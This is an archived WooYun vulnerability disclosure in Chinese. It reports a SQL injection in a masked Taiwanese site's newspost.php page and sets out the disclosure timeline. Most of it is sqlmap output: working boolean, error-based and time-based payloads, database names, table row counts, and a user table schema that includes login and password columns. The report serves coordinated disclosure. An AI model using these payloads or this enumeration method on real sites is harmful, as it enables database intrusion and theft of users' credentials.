乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
目标站点:http://**.**.**.**/tw/注入点:http://**.**.**.**/tw/newspost.php?id=3778
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3778 AND 5474=5474 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=3778 AND (SELECT 8773 FROM(SELECT COUNT(*),CONCAT(0x717a7a7171,(SELECT (ELT(8773=8773,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=3778 AND (SELECT * FROM (SELECT(SLEEP(5)))gcgj)---web application technology: Apache 2.2.29, PHP 5.5.22back-end DBMS: MySQL 5.0current database: 'decomyp1_decodb'current user is DBA: Falseavailable databases [3]:[*] decomyp1_decodb[*] decomyp1_event[*] information_schema
当前数据库的表,数据量还是挺大的:
Database: decomyp1_decodb+-----------------+---------+| Table | Entries |+-----------------+---------+| ads500_log | 1295440 || search | 300786 || user_log | 142982 || ads501_log | 53241 || photo | 41575 || album_link | 41515 || favorite | 41058 || photo_link | 31860 || favorite_news | 24423 || album | 23122 || `user` | 22171 || contact | 16316 || photo_resources | 7379 || p_comment | 4858 || subscribe | 4195 || ads502_log | 3954 || blog_index | 2770 || blog | 2456 || ads500_link | 1903 || msg | 1440 || msg_linkc | 1324 || top10_project | 1201 || msg_link | 1150 || blog_log | 885 || shop | 567 || addtable | 367 || area2 | 367 || feedback | 287 || ads500_client | 245 || location | 201 || shop_inv | 129 || category | 51 || top10 | 43 || blog_category | 34 || top_shop | 23 || area1 | 20 || shop_category | 16 || blog_project | 5 |+-----------------+---------+
`user`表中的数据量为22171
Table: user[35 columns]+-------------+----------------+| Column | Type |+-------------+----------------+| about | varchar(10000) || chk1 | varchar(2) || chk2 | varchar(2) || chk3 | varchar(2) || chk4 | varchar(2) || chk5 | varchar(2) || chkyn | varchar(2) || city_id | int(11) || create_time | timestamp || fav_qty | int(11) || faved_qty | int(11) || fb_connect | varchar(10) || fb_id | varchar(200) || iage | varchar(10) || iam | varchar(10) || icon | varchar(2) || id | int(11) || ikid | varchar(10) || ilive | varchar(10) || istyle | varchar(1000) || job | varchar(200) || location_id | int(11) || login_id | varchar(50) || login_pwd | varchar(20) || login_time | timestamp || msn | varchar(50) || myalbum_id | int(11) || photo_name | varchar(300) || photo_name2 | varchar(300) || screen_name | varchar(100) || user_ip | varchar(50) || web1 | varchar(200) || web2 | varchar(200) || web3 | varchar(200) || web4 | varchar(200) |+-------------+----------------+
用户的信息:
危害等级:高
漏洞Rank:17
确认时间:2015-12-15 23:19
感謝通報
暂无